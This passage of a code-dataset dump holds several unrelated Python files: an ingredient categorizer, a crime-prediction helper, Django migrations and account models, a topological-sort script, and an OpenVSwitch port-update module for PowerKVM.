\"linser\",\n \"spenat\",\n \"rosmarin\",\n \"svamp\",\n \"champinjon\",\n \"lime\",\n \"morot\",\n \"kikärt\",\n \"morötter\",\n \"persilja\",\n \"melon\",\n \"portabello\",\n \"oregano\",\n \"päron\",\n \"rucola\",\n \"dragon\",\n \"selleri\",\n \"rädisor\",\n \"majs\",\n \"mynta\",\n \"ingefära\",\n \"mango\",\n \"portabello\",\n \"avokado\",\n \"chili\",\n \"rödbet\",\n \"palsternack\",\n ],\n \"BREAD\": [\"bröd\", \"baguette\", \"ciabatta\", \"brioche\"],\n \"DAIRY\": [\"mjölk\", \"ost\"],\n \"MEAT\": [\n \"kött\",\n \"kyckling\",\n \"fläsk\",\n \"korv\",\n \"sej\",\n \"lax\",\n \"räk\",\n \"torsk\",\n \"färs\",\n \"bacon\",\n ],\n \"UNKNOWN\": [\"sataysås\", \"buljong\", \"chili flakes\", \"mix\", \"honung\", \"dukkah\"],\n \"BASIC\": [\"*\"],\n \"CARBS\": [\n \"pasta\",\n \"ris\",\n \"nudlar\",\n \"spaghetti\",\n \"couscous\",\n \"penne\",\n \"bulgur\",\n \"lasagne\",\n \"quinoa\",\n \"mjöl\",\n \"pommes\",\n \"tagliatelle\",\n \"tortilla\",\n \"deg\",\n ],\n}\n\n\nclass ItemCategory(Enum):\n UNKNOWN = 99\n BASIC = 98\n BREAD = 2\n MEAT = 5\n DAIRY = 3\n GREEN = 1\n CARBS = 4\n\n def __str__(self):\n return categoryDescription[self.name]\n\n def __lt__(self, other):\n if self.__class__ is other.__class__:\n return self.value < other.value\n return NotImplemented\n\n\ndef categorize(ingredients):\n \"\"\"\n Adds an ItemCategory to every ingredient in the given list.\n \"\"\"\n for ing in ingredients:\n foundCategory = False\n for category in ItemCategory:\n if category.name not in categoryKeywords:\n continue\n for keyword in categoryKeywords[category.name]:\n if keyword in ing[\"name\"].lower():\n ing[\"category\"] = category\n foundCategory = True\n break\n if foundCategory:\n break\n if foundCategory is False:\n ing[\"category\"] = ItemCategory.UNKNOWN\n","repo_name":"jojelen/Der-kleine-helfer","sub_path":"helfer/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27681312392","text":"from src.utils.logger import init_logger\n\nclass Predict():\n\n def __init__(self, df, model, **kwargs):\n \"\"\"[summary]\n\n Arguments:\n df {[type]} -- needs to have the following columns:\n [\"premisetype\", \"nbhd_id\", \"neighbourhood\",\n \"sq_metres\", \"crime_type\", \"occurrenceyear\"]\n model {function} -- w predict function that outputs a df \n including the following columns:\n [\"nbhd_id\", \"expected_crimes_per_hour\"]\n \"\"\"\n self.df = df\n self.logger = init_logger(\"predict_model\")\n self._get_nbhds()\n self.model = model\n self.check_df()\n\n def check_df(self):\n for col in [\"premisetype\", \"nbhd_id\", \"neighbourhood\",\n \"sq_metres\", \"crime_type\", \"occurrenceyear\"]:\n assert col in self.df.columns, f\"{col}\"\n\n def filter_df(self, premises, crimes, max_year, \n min_year, min_hour, max_hour,\n days_of_week):\n \"\"\"filter down the df for the viz\n\n Arguments:\n premises {list} -- [description]\n crimes {list} -- [description]\n max_year {int} -- max_year inclusive\n min_year {int} -- min_year inclusive\n \"\"\"\n self.logger.info(f\"shape before filtering: {self.df.shape}\")\n self.df_filtered = self.df[\n self.df.premisetype.astype(str).isin(premises)\n ]\n self.logger.info(f\"rows after filtering from premise: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrenceyear <= max_year\n ]\n self.logger.info(f\"rows after filtering from premise, max_year: 
{self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.crime_type.isin(crimes)\n ]\n self.logger.info(f\"rows after filtering from premise, max_year and crime: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrencehour < max_hour\n ]\n self.logger.info(f\"rows after filtering from max hour: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n [str(day).strip() in days_of_week \n for day in self.df_filtered.occurrencedayofweek.values]\n ]\n self.logger.info(f\"rows after filtering from max hour and dow: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrenceyear >= min_year\n ]\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrencehour >= min_hour\n ]\n self.logger.info(f\"rows after filtering from premise, min hour and min year: {self.df_filtered.shape[0]}\")\n self.hours_of_potential_crime = (\n 365 * \n (max_year - min_year + 1) * \n (len(days_of_week) / 7) * \n (max_hour - min_hour + 1)\n )\n self.logger.info(f\"shape after filtering: {self.df_filtered.shape}\")\n\n def get_predicted_cases_per_nbhd_per_hour(self):\n assert self.hours_of_potential_crime is not None, \"filter df first\"\n cases_per_nbhd = self.model.predict(\n self.df_filtered, self.hours_of_potential_crime\n )\n assert self.nbhd_df is not None, \"need to run self._get_nbhds first\"\n cases_for_all_nbhds = (\n self.nbhd_df\n .merge(cases_per_nbhd, on=\"nbhd_id\", how=\"left\")\n .fillna(0)\n )\n assert \"expected_crimes_per_hour\" in cases_for_all_nbhds.columns, \\\n \"missing required column from predict function on model\"\n return cases_for_all_nbhds\n\n def predict_cases_per_sq_km_per_nbhd_per_hour(self):\n cases_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n cases_w_sq_metres = cases_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"sq_metres\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n assert cases_w_sq_metres.shape[0] == cases_per_nbhd.shape[0], \"join is off\"\n cases_w_sq_metres[\"Probability of Crime\"] = (\n cases_w_sq_metres.expected_crimes_per_hour\n / (cases_w_sq_metres.sq_metres * 1e-6)\n ) * 100\n self.logger.info(\"\\n\" + str(cases_w_sq_metres.describe()))\n return cases_w_sq_metres\n\n def predict_cases_per_10k_people_per_nbhd_per_hour(self):\n cases_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n cases_w_pop = cases_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"population\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n assert cases_w_pop.shape[0] == cases_per_nbhd.shape[0], \"join is off\"\n cases_w_pop[\"Probability of Crime\"] = (\n cases_w_pop.expected_crimes_per_hour\n / (cases_w_pop.population / 10000)\n ) * 100\n self.logger.info(\"\\n\" + str(cases_w_pop.describe()))\n return cases_w_pop\n\n def get_num_crimes(self):\n crimes_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n crimes_per_nbhd.rename(columns={\"crimes_counts_per_nbhd\": \"Number of Crimes\"}, inplace=True)\n crimes_w_pop = crimes_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n return crimes_w_pop\n\n def _get_nbhds(self):\n self.nbhd_df = self.df[[\"nbhd_id\"]].drop_duplicates()\n 
","repo_name":"parker84/torcrime","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"16903133439","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('texto', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='MenuItem',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('texto', models.CharField(max_length=50)),\n ('clase', models.CharField(default='Entrada', max_length=2, choices=[('it', 'Entrada'), ('se', 'Sección'), ('en', 'encabezado')])),\n ('aprobacion', models.CharField(default='Autenticado', max_length=2, choices=[('au', 'Autenticado'), ('an', 'Anonimo'), ('', '')])),\n ('destino', models.CharField(default='/', max_length=256)),\n ('peso', models.SmallIntegerField()),\n ('padre', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to='menus.MenuItem', null=True, blank=True)),\n ('rol', models.ManyToManyField(blank=True, to='auth.Group')),\n ],\n options={\n 'ordering': ['padre', 'clase', 'peso'],\n 'get_latest_by': '-peso',\n },\n ),\n migrations.AddField(\n model_name='menu',\n name='items',\n field=models.ManyToManyField(blank=True, related_name='menus', to='menus.MenuItem'),\n ),\n migrations.AddField(\n model_name='menu',\n name='rol',\n field=models.ManyToManyField(blank=True, to='auth.Group'),\n ),\n migrations.AlterOrderWithRespectTo(\n name='menuitem',\n order_with_respect_to='padre',\n ),\n ]\n","repo_name":"sgjimenezv/Cyanocorax","sub_path":"cyanocorax/menus/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43177049463","text":"from sys import argv\n\nclass Vertex:\n def __init__(self, value):\n self.val = value\n self.neighbors = []\n\n def __add__(self, v):\n self.neighbors.append(v)\n \n def __repr__(self):\n ret = str(self.val) + ' : '\n ret += ', '.join(map\n (str, \n map(lambda x: x.val, self.neighbors)))\n return ret\n\nclass Graph:\n ''' Adjacency List'''\n def __init__(self, edges):\n self.nvertices = 0\n self.vertices = []\n added = {}\n for u, v in edges:\n if u not in added:\n tmp = Vertex(u)\n self.vertices.append(tmp)\n added[u] = tmp\n if v not in added:\n tmp = Vertex(v)\n self.vertices.append(tmp)\n added[v] = tmp\n added[u] + added[v]\n self.nvertices = len(self.vertices)\n\n def __repr__(self):\n ret = ''\n for v in self.vertices:\n ret += str(v) + '\\n'\n return ret\n\nvisited = set()\nwalk = []\n\ndef dfs_helper(g, v):\n global visited\n global walk\n visited.add(v)\n for n in v.neighbors:\n if n not in visited:\n dfs_helper(g, n)\n # add vertex to walk once we have finished \n # processing all it's neighbors\n walk.append(v.val)\n\ndef dfs(g):\n global visited\n global walk\n visited.clear()\n walk.clear()\n for v in g.vertices:\n if v not in visited:\n dfs_helper(g, v)\n # The vertices will finish processing in reverse order\n 
walk.reverse()\n return walk\n\ndef kahns(g):\n ''' Source removal algorithm '''\n # Holds the in-degree for each vertex\n counts = {}\n for v in g.vertices:\n counts[v] = 0\n for v in g.vertices:\n for n in v.neighbors:\n counts[n] += 1\n walk = []\n while len(walk) != g.nvertices:\n for v, c in counts.items():\n # A count of 0 means there are no incoming \n # edges so we have found a source\n if c == 0:\n walk.append(v.val)\n counts[v] = -1\n # Removing the source means we need to update the\n # counts of all the neighbors\n for n in v.neighbors:\n counts[n] -= 1\n break\n else:\n print(\"Toposort does not exist, graph is cyclic\")\n return []\n return walk\n\nif __name__ == '__main__':\n fname = argv[1]\n with open(fname, 'r') as f:\n edges = [line.strip().split(' ') for line in f]\n g = Graph(edges)\n print(\"Working Graph\")\n print(g)\n w = dfs(g)\n print('-' * 50)\n print(\"Toposort from DFS\")\n print(' '.join(walk))\n print('-' * 50)\n print('Toposort from source removal (kahns algorithm)')\n print(' '.join(kahns(g)))\n","repo_name":"jeff-lund/CS350","sub_path":"Toposort/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22115950012","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"djangod\",\n version=\"0.0.1\",\n author=\"Yannick Hillion\",\n author_email=\"yk.hillion@gmail.com\",\n description=\"Django God packages\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/yannickHillion/djangod\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/yannickHillion/djangod/issues\",\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Yannick Hillion\",\n \"Operating System :: OS Independent\",\n ],\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires=\">=3.6\",\n)","repo_name":"YannickHillion/djangod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3325049158","text":"#\n# =================================================================\n# =================================================================\n\nfrom nova import utils\nfrom nova.openstack.common import log as logging\nfrom powervc_nova.network.powerkvm.agent import commandlet\nfrom powervc_nova.network.powerkvm.agent import move_ip_address\nfrom powervc_nova.network.powerkvm.agent import multi_op\nfrom powervc_nova.network.powerkvm.agent import ifcfg_builder\nfrom powervc_nova.network.powerkvm.agent.common import micro_op\nfrom powervc_nova.network.powerkvm.agent.common import exception\nfrom powervc_nova.network.powerkvm.agent.common import warning\nfrom powervc_nova.network.powerkvm.agent.ovs_validation_mixin \\\n import OVSValidator\nfrom oslo.config import cfg\n\nCONF = cfg.CONF\nCONF.import_opt('integration_bridge', 'powervc_nova.network.powerkvm.agent')\n\nLOG = logging.getLogger(__name__)\n\n# These are used to track how far we have gotten into\n# the execution of the update and when will need to be\n# run is an undo is called\nOLD_PORT_DELETE = 1\nNEW_PORT_ADD = 2\nUNDO_ALL = 99\n\n\nclass OvsPortUpdate(micro_op.MicroOperation,\n OVSValidator):\n \"\"\"\n Update a port on an 
OpenVSwitch.\n \"\"\"\n\n def __init__(self, ovs_name, old_ovs_port_name, new_ovs_port_name,\n new_cmp_names):\n \"\"\"\n Constructor.\n\n :param ovs_name: The OpenVSwitch name that contains the port to update.\n :param old_ovs_port_name: The old name of the OVS Port to update\n :param new_ovs_port_name: The new name of the OVS Port to update\n :param new_cmp_names: A list of the new component names for the ovs\n port that is being updated\n \"\"\"\n self.ovs_name = ovs_name\n\n # Put this one in two places so the validator mixin finds it correctly\n self.ovs_port_name = old_ovs_port_name\n self.old_ovs_port_name = old_ovs_port_name\n\n self.new_ovs_port_name = new_ovs_port_name\n self.new_cmp_names = new_cmp_names\n self.commandex = commandlet.CommandExecutor()\n self.current_dom = None\n\n # need a way to determine where execute failed for undo purposes\n self.fail_location = UNDO_ALL\n\n # There are going to be several ifcfg file changes needed, so we build\n # a sub operations handler.\n self.sub_ops = multi_op.MultiMicroOp()\n\n def validate(self, curr_dom):\n \"\"\"\n Overrides parent method.\n\n Validate\n \"\"\"\n try:\n # Ensure the mixin has the correct DOM\n self.current_dom = curr_dom\n\n if self.current_dom is None:\n raise exception.IBMPowerKVMOVSNoValidDomSpecified\n\n \"\"\"\n NOTE: A failed check for any of the validation steps\n will result in an exception being raised and\n execution immediately returning to the caller.\n It is the caller's responsibility to process\n the exception appropriately\n \"\"\"\n\n # check if the ovs specified is the integration bridge\n self.validate_is_not_integration_bridge(self.ovs_name)\n\n # check for existence of specified ovs\n self.validate_ovs_exists(self.ovs_name)\n\n # check if old OVS port is assigned to the ovs\n self.validate_port_assigned(self.ovs_name, self.old_ovs_port_name)\n\n # check if new OVS port is already in use somewhere\n #self.validate_port_unassigned(self.old_ovs_port_name)\n\n # confirm at least one adapter in new port\n self.validate_adapter_list(self.new_cmp_names,\n self.old_ovs_port_name)\n\n # check if adapters for new port are available for use\n self.validate_adapters_available_update(self.new_cmp_names,\n self.old_ovs_port_name)\n\n self.validate_adapters_appear_once(self.new_cmp_names,\n self.ovs_port_name)\n\n except Exception as exp:\n LOG.error(exp)\n raise\n\n # Find the DOM's port object, to update\n ovs_dom = curr_dom.contains_vswitch_port_by_name(\n self.old_ovs_port_name)\n ovs_port = ovs_dom.get_port(self.old_ovs_port_name)\n ovs_port_names_to_add = []\n ovs_port_objs_to_remove = []\n ovs_port_objs_to_add = []\n for cmp_port in ovs_port.port_list:\n if cmp_port.name not in self.new_cmp_names:\n ovs_port_objs_to_remove.append(cmp_port)\n for cmp_port_name in self.new_cmp_names:\n has_port = False\n for cmp_port in ovs_port.port_list:\n if cmp_port.name == cmp_port_name:\n has_port = True\n break\n if not has_port:\n ovs_port_names_to_add.append(cmp_port_name)\n for port_name_to_add in ovs_port_names_to_add:\n obj = curr_dom.find_port_or_ovs(port_name_to_add)\n ovs_port_objs_to_add.append(obj)\n\n # Save off some 'original' data (or original by the time it hit here)\n self.orig_port_length = len(ovs_port.port_list)\n self.orig_cmp_names = []\n for comp in ovs_port.port_list:\n self.orig_cmp_names.append(comp.name)\n\n # Update the OVSPort to the new name\n ovs_port.name = self.new_ovs_port_name\n\n # If there will be multiple ports after this update, update ifcfg file\n # for an OVS port bond.\n 
is_bond = False\n if len(self.new_cmp_names) > 1:\n is_bond = True\n remove_on_undo = self.new_ovs_port_name != self.old_ovs_port_name\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.new_ovs_port_name,\n bond_cmp_names=self.new_cmp_names,\n remove_on_undo=remove_on_undo)\n self.sub_ops.micro_ops.append(op)\n\n # If we were coming from a single adapter, but are now multi\n # adapter, we need to update the original adapter to reflect this\n if len(self.orig_cmp_names) == 1:\n op = ifcfg_builder.IfcfgFileCmpBuilder(self.orig_cmp_names[0],\n ovs_name=self.ovs_name,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # If there were originally multiple ports and there will still be\n # multiple ports, but the bond name is changing, delete the old\n # bond ifcfg file\n if len(self.orig_cmp_names) > 1 and len(self.new_cmp_names) > 1:\n if self.old_ovs_port_name != self.new_ovs_port_name:\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.old_ovs_port_name,\n bond_cmp_names=[]) # <- This empty list deletes ifcfg file\n self.sub_ops.micro_ops.append(op)\n\n # If there was originally multiple ports and there will be a single\n # port after this update, remove the ifcfg file.\n if len(self.orig_cmp_names) > 1 and len(self.new_cmp_names) == 1:\n is_bond = False\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.old_ovs_port_name,\n bond_cmp_names=[]) # <- This empty list deletes ifcfg file\n self.sub_ops.micro_ops.append(op)\n\n # We must also update the final components ifcfg file, if we\n # are coming from a bond and are no longer going to be a bond\n op = ifcfg_builder.IfcfgFileCmpBuilder(self.new_cmp_names[0],\n ovs_name=self.ovs_name,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # We have detected which ports to add/remove. Now do the corresponding\n # updates to the DOM. The update guarantees us that there will be\n # at least one remaining port on the OVS Port (or else ovs_port_remove\n # would have been called.) Therefore, no IP Address movement is\n # needed for the removal scenario\n for port_remove in ovs_port_objs_to_remove:\n ovs_port.port_list.remove(port_remove)\n curr_dom.unused_component_list.append(port_remove)\n\n # We also need to check the ifcfg file of each removed port\n # to make sure we're not still referencing the parent bridge\n op = ifcfg_builder.IfcfgFileCmpBuilder(port_remove.name,\n ovs_name=None,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # Now we loop to add in ports. 
However, we must check to see if a port\n # that is being added required a move of the IP Address.\n ip_adapter = None\n for port_add in ovs_port_objs_to_add:\n\n # Move the port in the DOM\n ovs_port.port_list.append(port_add)\n if port_add in curr_dom.unused_component_list:\n curr_dom.unused_component_list.remove(port_add)\n\n # Check the IP Addresses for moving\n if port_add.ip_addresses is not None and\\\n len(port_add.ip_addresses) > 0:\n # First check to make sure we do not have an IP Address on\n # the vSwitch already.\n if ovs_dom.ip_addresses is not None and\\\n len(ovs_dom.ip_addresses) > 0:\n raise exception.IPAddressAdd(dev=port_add.name,\n ovs_name=self.ovs_name)\n if ip_adapter is not None:\n ov = self.ovs_name\n raise exception.IPAddressAddMultiPort(dev=port_add.name,\n ovs_name=ov)\n\n # General validations complete...set the move of the IP Address\n op = move_ip_address.MoveIpAddress(port_add.name,\n self.ovs_name, is_bond)\n self.sub_ops.micro_ops.append(op)\n ip_adapter = port_add\n else:\n # The port may not have an IP Address, but we still need\n # to work against its ifcfg file.\n op = ifcfg_builder.IfcfgFileCmpBuilder(port_add.name,\n self.ovs_name,\n is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # Save off the 'final' data\n self.final_port_length = len(ovs_port.port_list)\n self.final_cmp_names = []\n for comp in ovs_port.port_list:\n self.final_cmp_names.append(comp.name)\n\n # currently no warnings (just errors) returned by this micro op\n # However, the sub ops may have them so we'll just return those.\n return self.sub_ops.validate(self.current_dom)\n\n def execute(self):\n \"\"\"\n Overrides parent method.\n\n Execute\n \"\"\"\n try:\n # Remove old port\n LOG.debug('running ovs-vsctl del-port to remove old port')\n\n stdout, stderr = utils.execute('ovs-vsctl', 'del-port',\n self.ovs_name,\n self.old_ovs_port_name,\n run_as_root=True)\n if stderr and stderr != '':\n self.fail_location = OLD_PORT_DELETE\n raise exception.IBMPowerKVMCommandExecError(cmd='ovs-vsctl',\n exp=stderr)\n\n LOG.debug('ovs-vsctl del-port output = %s' % stdout)\n\n # Add new port\n if self.final_port_length == 1:\n LOG.debug('running ovs-vsctl add-port to add new port')\n # For just a single component, we use add-port.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-port',\n self.ovs_name,\n self.final_cmp_names[0],\n run_as_root=True)\n LOG.debug('ovs-vsctl add-port output = %s' % stdout)\n\n elif self.final_port_length > 1:\n LOG.debug('running ovs-vsctl add-bond to add new port')\n # For multiple components, we use add-bond.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-bond',\n self.ovs_name,\n self.new_ovs_port_name,\n *self.final_cmp_names,\n run_as_root=True)\n LOG.debug('ovs-vsctl add-bond output = %s' % stdout)\n\n if stderr and stderr != '':\n self.fail_location = NEW_PORT_ADD\n raise exception.IBMPowerKVMCommandExecError(cmd='ovs-vsctl',\n exp=stderr)\n\n # Finally run all the micro ops\n self.sub_ops.execute()\n\n # we've completed the full execute, so we need to indicate that,\n # if an undo is needed, we need to undo everything\n self.fail_location = UNDO_ALL\n except Exception as e:\n LOG.error(e)\n raise\n\n def undo(self):\n LOG.debug(\"Running undo of ovs port update execute\")\n\n try:\n # Start by undoing the micro ops\n self.sub_ops.undo()\n\n # Remove new port\n if self.fail_location >= NEW_PORT_ADD:\n LOG.debug('running ovs-vsctl del-port to remove new port')\n # The OVS port name should be the same as the component name.\n # The OVS port name is 
arbitrarily selected as the first\n # component in the list.\n stdout, stderr = utils.execute('ovs-vsctl', 'del-port',\n self.ovs_name,\n self.new_ovs_port_name,\n run_as_root=True)\n\n if stderr and stderr != '':\n raise exception.IBMPowerKVMCommandExecError(\n cmd='ovs-vsctl',\n exp=stderr)\n\n LOG.debug('ovs-vsctl del-port output = %s' % stdout)\n\n # Add old port\n if self.fail_location >= OLD_PORT_DELETE:\n if self.orig_port_length == 1:\n LOG.debug('running ovs-vsctl add-port to re-add old port')\n # For just a single component, we use add-port.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-port',\n self.ovs_name,\n self.orig_cmp_names[0],\n run_as_root=True)\n LOG.debug('ovs-vsctl add-port output = %s' % stdout)\n\n elif self.orig_port_length > 1:\n LOG.debug('running ovs-vsctl add-bond to add new port')\n # For multiple components, we use add-bond.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-bond',\n self.ovs_name,\n self.old_ovs_port_name,\n *self.orig_cmp_names,\n run_as_root=True)\n LOG.debug('ovs-vsctl add-bond output = %s' % stdout)\n\n if stderr and stderr != '':\n raise exception.IBMPowerKVMCommandExecError(\n cmd='ovs-vsctl',\n exp=stderr)\n\n except Exception as e:\n LOG.error(e)\n raise\n","repo_name":"windskyer/k_nova","sub_path":"paxes_nova/network/powerkvm/agent/ovs_port_update.py","file_name":"ovs_port_update.py","file_ext":"py","file_size_in_byte":16309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28380021128","text":"\nfrom django.contrib.auth.models import UserManager\nimport re\nfrom django.db import models\nfrom django.core import validators\nfrom django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin)\nfrom django.db.models.signals import pre_save,post_migrate\nfrom django.dispatch import receiver\nfrom django.db import models, transaction \n\n\nclass Region(models.Model):\n\n REGIONES_CHOICES = [\n ('Metropolitana de Santiago', 'Metropolitana de Santiago'),\n ('Tarapacá', 'Tarapacá'),\n ('Antofagasta', 'Antofagasta'),\n ('Atacama', 'Atacama'),\n ('Coquimbo', 'Coquimbo'),\n ('Valparaíso', 'Valparaíso'),\n ('Libertador General Bernardo O\\'Higgins', 'Libertador General Bernardo O\\'Higgins'),\n ('Maule', 'Maule'),\n ('Ñuble', 'Ñuble'),\n ('Biobío', 'Biobío'),\n ('La Araucanía', 'La Araucanía'),\n ('Los Ríos', 'Los Ríos'),\n ('Los Lagos', 'Los Lagos'),\n ('Aysén del General Carlos Ibáñez del Campo', 'Aysén del General Carlos Ibáñez del Campo'),\n ('Magallanes y de la Antártica Chilena', 'Magallanes y de la Antártica Chilena'),\n ]\n nombre = models.CharField(max_length=50, choices=REGIONES_CHOICES)\n def __str__(self):\n return self.nombre\n\n\n@receiver(post_migrate)\ndef create_regions(sender, **kwargs):\n if sender.name == 'accounts': \n existing_regions = set(Region.objects.values_list('nombre', flat=True))\n for region_choice in Region.REGIONES_CHOICES:\n region_name = region_choice[0]\n if region_name not in existing_regions:\n Region.objects.create(nombre=region_name)\n existing_regions.add(region_name)\n\n\nclass ComplejoDeportivo(models.Model):\n nombre = models.CharField(max_length=100)\n region = models.ForeignKey(Region, on_delete=models.CASCADE, default='Metropolitana de Santiago')\n url = models.URLField()\n imagen = models.ImageField(upload_to='static/complejos_deportivos/')\n \n def __str__(self):\n return self.nombre\n\n\nclass Permiso(models.Model):\n CLASES_CHOICES = [\n ('Permiso', 'Permiso'),\n ('Rol', 'Rol'),\n ('User', 'User'),\n ('Cliente', 
'Cliente'),\n ('Reserva', 'Reserva'),\n ('Ticket', 'Ticket'),\n ('Boleta', 'Boleta'),\n ('TipoCancha', 'TipoCancha'),\n ('Cancha', 'Cancha'),\n ('Horario', 'Horario'),\n ('Agenda', 'Agenda'),\n ]\n clase = models.CharField(max_length=15, choices=CLASES_CHOICES)\n nombre = models.CharField(max_length=50)\n\n class Meta:\n unique_together = ('clase', 'nombre') \n\n def __str__(self):\n return self.nombre\n\n#ESTE TIPO DE FUNCIONES ES PARA CUANDO SE HAGA EL MIGRATE RELLENAR AUTOMATICO CON PERMISOS POR DEFECTO\n@receiver(post_migrate)\ndef create_default_permissions(sender, **kwargs):\n if sender.name == 'accounts':\n with transaction.atomic():\n for choice_value, choice_display in Permiso.CLASES_CHOICES:\n for perm_action in ['crear', 'leer', 'actualizar', 'eliminar']:\n perm_name = f'{perm_action} {choice_display.lower()}'\n permiso, _ = Permiso.objects.get_or_create(\n clase=choice_value,\n nombre=perm_name\n )\n\n\nclass Rol(models.Model):\n ROL_CHOICES = [\n ('admin', 'Administrador'),\n ('trabajador', 'Trabajador'),\n ('cliente', 'Cliente'),\n ]\n\n nombre = models.CharField(max_length=15, unique=True, choices=ROL_CHOICES)\n permisos = models.ManyToManyField(Permiso)\n\n def __str__(self):\n return self.get_nombre_display()\n\n class Meta:\n verbose_name_plural = 'roles'\n\n\nclass CustomUserManager(UserManager):\n def create_superuser(self, username, email=None, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n admin_role, created = Rol.objects.get_or_create(nombre='admin')\n extra_fields['roles'] = admin_role\n\n return self._create_user(username, email, password, **extra_fields)\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n id = models.AutoField(primary_key=True, unique=True)\n username = models.CharField(\n 'Usuario', max_length=30, unique=True, validators=[\n validators.RegexValidator(\n re.compile('^[\\w.@+-]+$'),\n 'ingrese un nombre de usuario valido '\n 'Este valor debe contener solo letras, números '\n 'excepto: @/./+/-/_.',\n 'invalid'\n )\n ],\n help_text='Un nombre corto que sera usado'+\n ' para identificarlo de forma unica en la plataforma.'\n )\n name = models.CharField('Nombre', max_length=20)\n apellidos = models.CharField('Apellidos', max_length=30)\n email = models.EmailField('Email', unique=True)\n is_staff = models.BooleanField('Admin', default=False)\n is_active = models.BooleanField('Ativo', default=True)\n date_joined = models.DateTimeField('Data de Entrada', auto_now_add=True)\n roles = models.ForeignKey(Rol, on_delete=models.CASCADE)\n\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email']\n\n objects = CustomUserManager()\n\n class Meta:\n verbose_name = 'Usuario'\n verbose_name_plural = 'Usuarios'\n\n def __str__(self):\n return self.name or self.username\n\n def get_full_name(self):\n return str(self)\n\n def get_short_name(self):\n return str(self).split(' ')[0]\n\n\n#ESTA FUNCION HACE QUE CUANDO SE GUARDE UN USUARIO ESTE TENGA EL ROL POR DEFECTO DE CLIENTE\n@receiver(pre_save, sender=User)\ndef assign_default_role(sender, instance, **kwargs):\n if not instance.roles:\n default_role, created = Rol.objects.get_or_create(nombre='cliente')\n instance.roles = default_role\n\n#ESTA FUNCION HACE QUE SI EL USUARIO CAMBIA SU ROL A ADMINISTRADOR SEA LO MISMO QUE 
